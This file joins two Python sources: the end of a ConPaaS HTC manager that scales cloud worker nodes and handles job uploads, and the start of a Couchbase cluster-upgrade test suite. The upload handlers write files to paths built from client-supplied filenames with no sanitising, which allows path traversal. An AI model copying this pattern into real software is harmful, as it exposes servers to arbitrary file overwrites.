return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
self.state = self.S_EPILOGUE
Thread(target=self._do_shutdown, args=[]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_shutdown(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.logger.info(self.nodes)
self.nodes = []
self.logger.info("All nodes deleted")
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.add_context_replacement(dict(STRING='htc'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
#Thread(target=self._do_add_nodes, args=[count, kwargs['cloud'], kwargs['type']]).start()
Thread(target=self._do_add_nodes, args=[count, kwargs['cloud']]).start()
self.logger.info(str(kwargs))
return HttpJsonResponse({ 'state': self.state })
#TODO remove hack!!!
#def _do_add_nodes(self, count, cloud, m_type):
def _do_add_nodes(self, count, cloud):
"""Add 'count' HTC Nodes to this deployment"""
#if m_type in ['small', 'medium'] and cloud=='default':
# cloud = "cloud.amsterdam."+m_type
startCloud = self._init_cloud(cloud)
self.logger.info(str(self.controller.get_clouds()))
vals = { 'action': '_do_add_nodes', 'count': count }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT, startCloud)
# Startup agents
for node in node_instances:
self.logger.info("Adding node %s: " % (node.id))
client.create_node(node.ip, self.AGENT_PORT, self.hub_ip)
self.logger.info("Added node %s: %s " % (node.id, node.ip))
node_info.add_node_info('/etc/hosts', node.ip, node.id)
m_type = self.config_parser.get(cloud, 'INST_TYPE')
worker = Worker(node.id, node.ip, node.private_ip, node.cloud_name, m_type)
self.service.add_worker(worker, int(node.id))
self.logger.info(str(self.service))
self.nodes += node_instances
self.state = self.S_RUNNING
if m_type in self.pool:
self.pool[m_type]+=count
else:
self.pool[m_type]=count
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.logger.info(type(kwargs["id"]))
if kwargs["id"] not in self.service.registered_workers.keys():
return HttpErrorResponse("ERROR: This worker does not exist")
id=kwargs["id"]
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[id]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, worker_id):
"""Remove 'count' nodes, starting from the end of the list. This way
the HTC Hub gets removed last."""
self.logger.info(str(self.controller.get_clouds()))
node = self.service.get_worker(worker_id)
client.condor_off(node.ip, self.AGENT_PORT) # sign off with condor
self.logger.info("Removing node with IP %s" % node)
self.controller.delete_nodes([ node ])
node_info.remove_node_info('/etc/hosts', node.ip)
self.service.remove_worker(worker_id)
self.nodes.remove(node)
self.logger.info(str(self.service))
self.state = self.S_RUNNING
self.pool[node.type]-=1
@expose('UPLOAD')
def create_job(self, kwargs):
fileobject = kwargs.popitem()
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'create_job' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, fileobject[0])
# Write the uploaded script to filesystem
open(fullpath, 'w').write(fileobject[1].file.read())
key = self.service.add_bot(fullpath)
self.logger.debug("create_job with args=%s" % kwargs)
self.logger.info(str(self.service))
return HttpJsonResponse({ 'id': key })
@expose('UPLOAD')
def upload_file(self, kwargs):
fileobject = kwargs.popitem()
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'upload_file' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, fileobject[0])
# Write the uploaded script to filesystem
open(fullpath, 'w').write(fileobject[1].file.read())
self.files.append(fullpath)
self.logger.info(str(self.files))
@expose('UPLOAD')
def add(self, kwargs):
job_id = int(kwargs.pop('job_id'))
fileobject = kwargs.popitem()
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, fileobject[0])
# Write the uploaded script to filesystem
open(fullpath, 'w').write(fileobject[1].file.read())
key = self.service.add_on(fullpath, job_id)
self.logger.debug("add with args=%s" % kwargs)
self.logger.debug(type(key))
self.logger.info(str(self.service))
return HttpJsonResponse({ 'id': job_id })
@expose('POST')
def sample(self,kwargs):
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'sample' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
job_id = int(kwargs.pop('job_id'))
if not self.service.job_exists(job_id):
return HttpErrorResponse("wrong job_id: "+ str(job_id))
size = self.service.sample_job(job_id)
if size == -2:
return HttpErrorResponse("sampling already started for job_id: "+ str(job_id))
if size == -3:
return HttpErrorResponse("sampling already finished for job_id: "+ str(job_id))
self.logger.info(size)
Thread(target=self._do_check_jobs, args=[]).start()
return HttpJsonResponse({ 'out': "sampling started" })
@expose('POST')
def execute(self,kwargs):
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'execute' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
job_id = int(kwargs.pop('job_id'))
if not self.service.job_exists(job_id):
return HttpErrorResponse("wrong job_id: "+ str(job_id))
jb_key = "%d.0" % job_id
if self.service.tf_job_dict[jb_key]['SamplingStarted'] == False:
return HttpErrorResponse("Sampling not started for job id: "+ str(job_id))
if self.service.tf_job_dict[jb_key]['SamplingReady'] == False:
return HttpErrorResponse("Sampling not ready for job id: "+ str(job_id))
size = self.service.execute_job(job_id)
if size == -1:
return HttpErrorResponse("wrong job_id: "+ str(job_id))
return HttpJsonResponse({ 'out': "execution started, feel free to add more bags" })
@expose('POST')
def callback_time(self,kwargs):
task_id = kwargs.pop('task_id')
self.service.callback_time(task_id)
@expose('POST')
def get_config(self,kwargs):
# self.logger.info(self.configuration.conf_dict )
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'get_config' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
t = int(kwargs['t'])
if t not in self.configuration.conf_dict:
return HttpErrorResponse("manager not configured yet for throughput = "+ str(t))
return HttpJsonResponse({"conf":self.configuration.conf_dict[t]})
@expose('POST')
def get_m(self,kwargs):
# self.logger.info(self.configuration.m )
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'get_cost' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
t = int(kwargs['t'])
if t not in self.configuration.m:
return HttpErrorResponse("manager not configured yet for throughput = "+ str(t))
return HttpJsonResponse({"conf":self.configuration.m[t]})
@expose('POST')
def select(self,kwargs):
# self.logger.info(self.configuration.m )
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'select' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
t = int(kwargs['t'])
if t not in self.configuration.m:
return HttpErrorResponse("manager not configured yet for throughput = "+ str(t))
for k in self.pool:
while self.pool[k] > self.configuration.conf_dict[t][self.configuration.keys[k]]:
wid=self.service.get_worker_id(k)
self._do_remove_nodes(wid)
if self.pool[k] < self.configuration.conf_dict[t][self.configuration.keys[k]]:
count = self.configuration.conf_dict[t][self.configuration.keys[k]] - self.pool[k]
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count, 'cloud.amsterdam.'+ str(k)]).start()
self.logger.info(str(self.service))
return HttpJsonResponse({"conf:":self.configuration.m[t]})
def update_configuration(self, tasks_dict):
f1 = open('t1','a')
f2 = open('t2','a')
tot = {}
num = {}
for k in tasks_dict:
for t in tasks_dict[k]:
if t[self.MT] in tot:
tot[t[self.MT]] += t[self.RWCT]
num[t[self.MT]] += 1
else:
tot[t[self.MT]] = t[self.RWCT]
num[t[self.MT]] = 1
for k in tot:
            print >>f1, k, tot[k]/num[k]
self.logger.info(k +" "+str(tot[k]/num[k]))
av = self.configuration.averages[self.configuration.keys[k]]
no = self.configuration.notasks[self.configuration.keys[k]]
newtot = tot[k] + (no*av)
newno = num[k] + no
newav = 0
if av == 0:
newav = newtot/newno
else:
newav = 0.6*av + 0.4*tot[k]/num[k]
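            # Worked example with illustrative numbers (not from the original code):
            # with a previous average av = 10.0 s and a new batch averaging
            # tot[k]/num[k] = 20.0 s, the smoothed value is
            # newav = 0.6 * 10.0 + 0.4 * 20.0 = 14.0 s, so recent task runtimes
            # shift the per-machine-type estimate without discarding history.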
self.configuration.set_average(k,newav,newno)
print >>f2, k,newav
self.logger.info(k +" "+str(newav))
f1.close()
f2.close()
self.configuration.relevant_time_unit()
self.configuration.relevant_time_unit()
self.configuration.dynamic_configuration()
self.logger.info(self.configuration.averages)
def _do_check_jobs(self):
size=0
while True:
if len(self.service.tf_job_info)>size:
for k in self.service.tf_job_info:
if 'complete' not in self.service.tf_job_info[k]:
self.update_configuration(self.service.tf_job_info[k])
self.service.tf_job_info[k]['complete']=0
size = len(self.service.tf_job_info)
else:
time.sleep(2)
def __is_hub(self, node):
"""Return True if the given node is the HTC Hub"""
return node.ip == self.hub_ip
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
print str(self.service.registered_workers)
return HttpJsonResponse(self.service.s_registered_workers)
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
if self.state == self.S_RUNNING: # service is present
fn = "job_info@%d" % time.time()
fd = open(fn, "w")
pp = pprint.PrettyPrinter(indent=4,width=160,stream=fd)
pp.pprint(self.service.tf_job_info)
            fd.close()
self.service.tf_dict['file'] = fn
self.service.tf_dict['dir'] = os.getcwd()
self.logger.info(str(self.service))
return HttpJsonResponse({'state': self.state, 'type': 'htc', 'dict': self.service.tf_dict})
else:
return HttpJsonResponse({'state': self.state, 'type': 'htc'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'is_hub': self.__is_hub(serviceNode)
}
})
|
upgrade_tests.py
|
from .newupgradebasetest import NewUpgradeBaseTest
import queue
import copy
import threading
from random import randint
from remote.remote_util import RemoteMachineShellConnection
from couchbase_helper.tuq_helper import N1QLHelper
from pytests.eventing.eventing_helper import EventingHelper
from eventing.eventing_base import EventingBaseTest
from lib.testconstants import STANDARD_BUCKET_PORT
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from pytests.eventing.eventing_constants import HANDLER_CODE
from rebalance.rebalance_base import RebalanceBaseTest
from couchbase_helper.documentgenerator import BlobGenerator
class UpgradeTests(NewUpgradeBaseTest, EventingBaseTest):
def setUp(self):
super(UpgradeTests, self).setUp()
self.queue = queue.Queue()
self.graceful = self.input.param("graceful", False)
self.after_upgrade_nodes_in = self.input.param("after_upgrade_nodes_in", 1)
self.after_upgrade_nodes_out = self.input.param("after_upgrade_nodes_out", 1)
self.verify_vbucket_info = self.input.param("verify_vbucket_info", True)
self.initialize_events = self.input.param("initialize_events", "").split(":")
self.upgrade_services_in = self.input.param("upgrade_services_in", None)
self.after_upgrade_services_in = \
self.input.param("after_upgrade_services_in", None)
self.after_upgrade_services_out_dist = \
self.input.param("after_upgrade_services_out_dist", None)
self.in_between_events = self.input.param("in_between_events", "").split(":")
self.after_events = self.input.param("after_events", "").split(":")
self.before_events = self.input.param("before_events", "").split(":")
self.upgrade_type = self.input.param("upgrade_type", "online")
self.sherlock_upgrade = self.input.param("sherlock", False)
self.max_verify = self.input.param("max_verify", None)
self.verify_after_events = self.input.param("verify_after_events", True)
self.online_upgrade_type = self.input.param("online_upgrade_type", "swap")
self.offline_upgrade_type = self.input.param("offline_upgrade_type", "offline_shutdown")
self.src_bucket_name = self.input.param('src_bucket_name', 'src_bucket')
self.eventing_log_level = self.input.param('eventing_log_level', 'INFO')
self.dst_bucket_name = self.input.param('dst_bucket_name', 'dst_bucket')
self.dst_bucket_name1 = self.input.param('dst_bucket_name1', 'dst_bucket1')
self.metadata_bucket_name = self.input.param('metadata_bucket_name', 'metadata')
self.source_bucket_mutation_name = self.input.param('source_bucket_mutation_name', 'source_bucket_mutation')
self.dst_bucket_curl_name = self.input.param('dst_bucket_curl_name', 'dst_bucket_curl')
self.create_functions_buckets = self.input.param('create_functions_buckets', True)
self.use_memory_manager = self.input.param('use_memory_manager', True)
self.test_upgrade_with_xdcr = self.input.param('xdcr', False)
self.final_events = []
self.n1ql_helper = None
self.total_buckets = 1
self.in_servers_pool = self._convert_server_map(self.servers[:self.nodes_init])
""" Init nodes to not upgrade yet """
for key in list(self.in_servers_pool.keys()):
self.in_servers_pool[key].upgraded = False
self.out_servers_pool = self._convert_server_map(self.servers[self.nodes_init:])
self.gen_initial_create = BlobGenerator('upgrade', 'upgrade',
self.value_size,
end=self.num_items)
self.gen_create = BlobGenerator('upgrade', 'upgrade', self.value_size,
start=self.num_items + 1,
end=self.num_items * 1.5)
self.gen_update = BlobGenerator('upgrade', 'upgrade', self.value_size,
start=self.num_items // 2,
end=self.num_items)
self.gen_delete = BlobGenerator('upgrade', 'upgrade', self.value_size,
start=self.num_items // 4,
end=self.num_items // 2 - 1)
self.after_gen_create = BlobGenerator('upgrade', 'upgrade',
self.value_size,
start=self.num_items * 1.6,
end=self.num_items * 2)
self.after_gen_update = BlobGenerator('upgrade', 'upgrade',
self.value_size, start=1,
end=self.num_items/4)
self.after_gen_delete = BlobGenerator('upgrade', 'upgrade',
self.value_size,
start=self.num_items * .5,
end=self.num_items * 0.75)
initial_services_setting = self.input.param("initial-services-setting", None)
if initial_services_setting is not None and initial_services_setting.count("kv") < 2:
            raise Exception("This test needs at least 2 kv nodes to run")
""" Install original cb server """
self._install(self.servers[:self.nodes_init])
if not self.init_nodes and initial_services_setting is not None:
if "-" in initial_services_setting:
self.multi_nodes_services = True
initial_services = initial_services_setting.split("-")[0]
else:
initial_services = initial_services_setting
self.initialize_nodes([self.servers[:self.nodes_init][0]],
services=initial_services)
RestConnection(self.master).set_indexer_storage_mode()
self._log_start(self)
if len(self.servers[:self.nodes_init]) > 1:
if initial_services_setting is None:
self.cluster.rebalance(self.servers[:1],
self.servers[1:self.nodes_init],
[],
use_hostnames=self.use_hostnames)
else:
set_services = self.initial_services(initial_services_setting)
for i in range(1, len(set_services)):
self.cluster.rebalance([self.servers[0]],
[self.servers[i]],
[],
use_hostnames=self.use_hostnames,
services=[set_services[i]])
self.sleep(10)
else:
self.cluster.rebalance([self.servers[0]], self.servers[1:], [],
use_hostnames=self.use_hostnames)
self.sleep(5)
""" sometimes, when upgrade failed and node does not install couchbase
server yet, we could not set quota at beginning of the test. We
have to wait to install new couchbase server to set it properly here """
servers_available = copy.deepcopy(self.servers)
if len(self.servers) > int(self.nodes_init):
servers_available = servers_available[:self.nodes_init]
self.quota = self._initialize_nodes(
self.cluster, servers_available, self.disabled_consistent_view,
self.rebalanceIndexWaitingDisabled,
self.rebalanceIndexPausingDisabled, self.maxParallelIndexers,
self.maxParallelReplicaIndexers, self.port)
self.add_built_in_server_user(node=self.master)
self.bucket_size = self._get_bucket_size(self.quota, self.total_buckets)
self.create_buckets()
self.n1ql_server = None
self.success_run = True
self.failed_thread = None
self.generate_map_nodes_out_dist_upgrade(self.after_upgrade_services_out_dist)
if self.upgrade_services_in != "same":
self.upgrade_services_in = self.get_services(list(self.in_servers_pool.values()),
self.upgrade_services_in, start_node = 0)
self.after_upgrade_services_in = self.get_services(list(self.out_servers_pool.values()),
self.after_upgrade_services_in, start_node = 0)
self.fts_obj = None
self.index_name_prefix = None
if self.test_upgrade_with_xdcr:
from pytests.xdcr.xdcr_callable import XDCRCallable
# Setup XDCR src and target clusters
self.xdcr_handle = XDCRCallable(self.servers[:self.nodes_init])
def tearDown(self):
super(UpgradeTests, self).tearDown()
"""
This test_upgrade is written to upgrade from 5.x.x to 6.5.x
    This test_upgrade function can run many different test cases. All you need are the right params.
params:
    **** Must be included when running test_upgrade in a job config or conf file ****
    upgrade_test=True (this param must be included to run this test_upgrade)
    skip_init_check_cbserver=true (this param bypasses the ns_server check inside each node)
    *** the params below may take different values ***
    items=10000 (can be any number)
initial_version=5.5.0-2958 (original cb version in cluster.
Must be in format x.x.x-xxxx )
released_upgrade_version=6.5.0-3265 (upgrade cluster to Mad-Hatter.
Must be in format x.x.x-xxxx )
nodes_init=3 (number of node cluster will form)
    upgrade_type=offline (if this param is not passed, the default value is online.
                          If the value is offline, the default
                          offline_upgrade_type is a normal offline upgrade)
    offline_upgrade_type=offline_failover (this param is used with upgrade_type=offline;
                          to do an offline failover upgrade, pass
                          offline_upgrade_type=offline_failover)
    initialize_events=event_before_upgrade (events must be separated with a dash, like
                          kv_ops_initialize-create_fts_index_query_compare.
                          The functions called must be in underscore format)
initial-services-setting=kv,index-kv,n1ql,fts-kv,eventing,index,n1ql
    Services for each node are separated with a dash.
    Remember, no spaces around the commas.
    In the example above, node 1 runs services kv,index
    node 2 runs services kv,n1ql,fts
    node 3 runs services kv,eventing,index
    init_nodes=False (the default value is true, which takes services from the ini file and
                          disables the initial-services-setting param above)
    upgrade_services_in=same (if this param is not passed, services are taken from the ini file)
    after_events=rebalance_in-run_fts_query_and_compare (events must be separated with a dash)
    after_upgrade_services_in=kv,fts (this param passes services to the rebalance_in
                          node above. If 2 nodes are added in, it needs 2
                          services separated by a dash. Otherwise, services
                          are taken from the ini file)
    Here is an example of an offline failover upgrade test with fts
-t upgrade.upgrade_tests.UpgradeTests.test_upgrade,items=5000,initial_version=5.5.0-2958,
nodes_init=3,initialize_events=kv_ops_initialize-create_fts_index_query_compare,
initial-services-setting=kv,index-kv,n1ql,fts-kv,eventing,index,n1ql,
upgrade_services_in=same,after_events=rebalance_in-run_fts_query_and_compare,
after_upgrade_services_in=kv,fts,disable_HTP=True,upgrade_test=True,init_nodes=False,
skip_init_check_cbserver=true,released_upgrade_version=6.5.0-3265,dgm_run=true,
doc-per-day=1,upgrade_type=offline,offline_upgrade_type=offline_failover
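    A minimal online (swap) upgrade run, using only the params described above,
    might look like:
    -t upgrade.upgrade_tests.UpgradeTests.test_upgrade,items=10000,initial_version=5.5.0-2958,
    nodes_init=3,initialize_events=kv_ops_initialize,upgrade_services_in=same,
    after_events=rebalance_in,upgrade_test=True,init_nodes=False,
    skip_init_check_cbserver=true,released_upgrade_version=6.5.0-3265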
"""
def test_upgrade(self):
self.event_threads = []
self.after_event_threads = []
try:
self.log.info("\n*** Start init operations before upgrade begins ***")
if self.initialize_events:
initialize_events = self.run_event(self.initialize_events)
self.finish_events(initialize_events)
if not self.success_run and self.failed_thread is not None:
raise Exception("*** Failed to {0} ***".format(self.failed_thread))
self.cluster_stats(self.servers[:self.nodes_init])
if self.before_events:
self.event_threads += self.run_event(self.before_events)
self.log.info("\n*** Start upgrade cluster ***")
self.event_threads += self.upgrade_event()
self.finish_events(self.event_threads)
self.log.info("\nWill install upgrade version to any free nodes")
out_nodes = self._get_free_nodes()
self.log.info("Here is free nodes {0}".format(out_nodes))
""" only install nodes out when there is cluster operation """
cluster_ops = ["rebalance_in", "rebalance_out", "rebalance_in_out"]
for event in self.after_events[0].split("-"):
if event in cluster_ops:
self.log.info(
"\n\nThere are cluster ops after upgrade. "
"Need to install free nodes in upgrade version")
self.initial_version = self.upgrade_versions[0]
self._install(out_nodes)
break
self.generate_map_nodes_out_dist_upgrade(
self.after_upgrade_services_out_dist)
self.log.info("\n\n*** Start operations after upgrade is done ***")
self.add_built_in_server_user()
if self.after_events:
self.after_event_threads = self.run_event(self.after_events)
self.finish_events(self.after_event_threads)
if not self.success_run and self.failed_thread is not None:
raise Exception("*** Failed to {0} ***".format(self.failed_thread))
""" Default set to always verify data """
if self.after_events[0]:
self.log.info("*** Start after events ***")
for event in self.after_events[0].split("-"):
if "delete_buckets" in event:
self.log.info("After events has delete buckets event. "
"No items verification needed")
self.verify_after_events = False
break
if self.verify_after_events:
self.log.info("*** Start data verification ***")
self.cluster_stats(list(self.in_servers_pool.values()))
self._verify_data_active_replica()
except Exception as ex:
self.log.info(ex)
print("*** Stop all events to stop the test ***")
self.stop_all_events(self.event_threads)
self.stop_all_events(self.after_event_threads)
raise
finally:
self.log.info("any events for which we need to cleanup")
self.cleanup_events()
def _record_vbuckets(self, master, servers):
bucket_map = dict()
for bucket in self.buckets:
self.log.info("Record vbucket for the bucket {0}"
.format(bucket.name))
bucket_map[bucket.name] = RestHelper(RestConnection(master))\
._get_vbuckets(servers, bucket_name=bucket.name)
return bucket_map
def _find_master(self):
self.master = list(self.in_servers_pool.values())[0]
def _verify_data_active_replica(self):
""" set data_analysis True by default """
self.data_analysis = self.input.param("data_analysis", False)
self.total_vbuckets = self.initial_vbuckets
if self.data_analysis:
disk_replica_dataset, disk_active_dataset = \
self.get_and_compare_active_replica_data_set_all(
list(self.in_servers_pool.values()),
self.buckets, path=None)
self.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
list(self.in_servers_pool.values()), self.buckets, path=None)
""" check vbucket distribution analysis after rebalance """
self.vb_distribution_analysis(
servers=list(self.in_servers_pool.values()),
buckets=self.buckets, std=1.0,
total_vbuckets=self.total_vbuckets)
def _verify_vbuckets(self, old_vbucket_map, new_vbucket_map):
for bucket in self.buckets:
self._verify_vbucket_nums_for_swap(old_vbucket_map[bucket.name],
new_vbucket_map[bucket.name])
def stop_all_events(self, thread_list):
for t in thread_list:
try:
                if t.is_alive():
t.stop()
except Exception as ex:
self.log.info(ex)
def cleanup_events(self):
thread_list = []
for event in self.final_events:
t = threading.Thread(target=self.find_function(event), args=())
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def run_event_in_sequence(self, events):
q = self.queue
self.log.info("run_event_in_sequence")
for event in events.split("-"):
t = threading.Thread(target=self.find_function(event), args=(q,))
t.daemon = True
t.start()
t.join()
self.success_run = True
while not self.queue.empty():
self.success_run &= self.queue.get()
if not self.success_run:
self.failed_thread = event
break
def run_event(self, events):
thread_list = []
for event in events:
if "-" in event:
t = threading.Thread(target=self.run_event_in_sequence, args=(event,))
t.start()
t.join()
elif event != '':
t = threading.Thread(target=self.find_function(event), args=())
t.daemon = True
t.start()
thread_list.append(t)
return thread_list
def find_function(self, event):
return getattr(self, event)
def finish_events(self, thread_list):
for t in thread_list:
t.join()
def upgrade_event(self):
self.log.info("upgrade_event")
thread_list = []
if self.upgrade_type == "online":
t = threading.Thread(target=self.online_upgrade, args=())
elif self.upgrade_type == "offline":
t = threading.Thread(target=self.offline_upgrade, args=())
t.daemon = True
t.start()
thread_list.append(t)
return thread_list
def server_crash(self):
try:
self.log.info("server_crash")
self.targetProcess = self.input.param("targetProcess", 'memcached')
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.terminate_process(process_name=self.targetProcess)
except Exception as ex:
self.log.info(ex)
raise
def server_stop(self):
try:
self.log.info("server_stop")
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.stop_server()
self.final_events.append("start_server")
except Exception as ex:
self.log.info(ex)
raise
def start_server(self):
try:
self.log.info("start_server")
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.start_server()
except Exception as ex:
self.log.info(ex)
raise
def failover(self, queue=None):
failover_node = False
try:
self.log.info("VVVVVV failover a node ")
print("failover node ", self.nodes_out_list)
nodes = self.get_nodes_in_cluster_after_upgrade()
failover_task = self.cluster.async_failover([self.master],
failover_nodes = self.nodes_out_list, graceful=self.graceful)
failover_task.result()
if self.graceful:
""" Check if rebalance is still running """
msg = "graceful failover failed for nodes"
self.assertTrue(RestConnection(self.master).monitorRebalance(\
stop_if_loop=True), msg=msg)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], self.nodes_out_list)
rebalance.result()
failover_node = True
else:
msg = "Failed to failover a node"
self.assertTrue(RestConnection(self.master).monitorRebalance(\
stop_if_loop=True), msg=msg)
rebalance = self.cluster.async_rebalance(nodes, [],
self.nodes_out_list)
rebalance.result()
failover_node = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if failover_node and queue is not None:
queue.put(True)
def autofailover(self):
try:
self.log.info("autofailover")
autofailover_timeout = 30
status = RestConnection(self.master).update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
servr_out = self.nodes_out_list
remote = RemoteMachineShellConnection(self.nodes_out_list[0])
remote.stop_server()
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [self.nodes_out_list[0]])
rebalance.result()
except Exception as ex:
self.log.info(ex)
raise
def network_partitioning(self):
try:
self.log.info("network_partitioning")
for node in self.nodes_out_list:
self.start_firewall_on_node(node)
self.final_events.append("undo_network_partitioning")
except Exception as ex:
self.log.info(ex)
raise
def undo_network_partitioning(self):
try:
self.log.info("remove_network_partitioning")
for node in self.nodes_out_list:
self.stop_firewall_on_node(node)
except Exception as ex:
self.log.info(ex)
raise
def bucket_compaction(self):
try:
self.log.info("couchbase_bucket_compaction")
compact_tasks = []
for bucket in self.buckets:
compact_tasks.append(self.cluster.async_compact_bucket(self.master, bucket))
except Exception as ex:
self.log.info(ex)
raise
def warmup(self, queue=None):
node_warmuped = False
try:
self.log.info("Start warmup operation")
nodes = self.get_nodes_in_cluster_after_upgrade()
for server in nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
ClusterOperationHelper.wait_for_ns_servers_or_assert(nodes, self)
node_warmuped = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if node_warmuped and queue is not None:
queue.put(True)
def create_lww_bucket(self):
self.time_synchronization='enabledWithOutDrift'
bucket='default'
print('time_sync {0}'.format(self.time_synchronization))
helper = RestHelper(self.rest)
if not helper.bucket_exists(bucket):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(
self.servers)
info = self.rest.get_nodes_self()
self.rest.create_bucket(bucket=bucket,
ramQuotaMB=512, authType='sasl', timeSynchronization=self.time_synchronization)
try:
ready = BucketOperationHelper.wait_for_memcached(self.master,
bucket)
                self.assertTrue(ready, msg='[ERROR] Expected lww bucket creation to succeed.')
finally:
self.log.info("Success, created lww bucket")
def bucket_flush(self, queue=None):
bucket_flushed = False
try:
self.log.info("bucket_flush ops")
self.rest =RestConnection(self.master)
for bucket in self.buckets:
self.rest.flush_bucket(bucket.name)
bucket_flushed = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if bucket_flushed and queue is not None:
queue.put(True)
def delete_buckets(self, queue=None):
bucket_deleted = False
try:
self.log.info("delete_buckets")
self.rest = RestConnection(self.master)
for bucket in self.buckets:
self.log.info("delete bucket {0}".format(bucket.name))
self.rest.delete_bucket(bucket.name)
bucket_deleted = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if bucket_deleted and queue is not None:
queue.put(True)
def create_buckets(self, queue=None):
bucket_created = False
try:
self.log.info("create_buckets")
if self.dgm_run:
self.bucket_size = 256
self.default_bucket = False
self.sasl_buckets = 1
self.sasl_bucket_name = self.sasl_bucket_name + "_" \
+ str(self.total_buckets)
self.rest = RestConnection(self.master)
self._bucket_creation()
self.sleep(5, "sleep after create bucket")
self.total_buckets +=1
bucket_created = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if bucket_created and queue is not None:
queue.put(True)
def change_bucket_properties(self):
try:
self.rest = RestConnection(self.master)
#Change Bucket Properties
for bucket in self.buckets:
self.rest.change_bucket_props(bucket, ramQuotaMB=None,\
authType=None, saslPassword=None, replicaNumber=0,\
proxyPort=None, replicaIndex=None, flushEnabled=False)
except Exception as ex:
self.log.info(ex)
raise
def rebalance_in(self, queue=None):
rebalance_in = False
service_in = copy.deepcopy(self.after_upgrade_services_in)
if service_in is None:
service_in = ["kv"]
free_nodes = self._convert_server_map(self._get_free_nodes())
if not list(free_nodes.values()):
raise Exception("No free node available to rebalance in")
try:
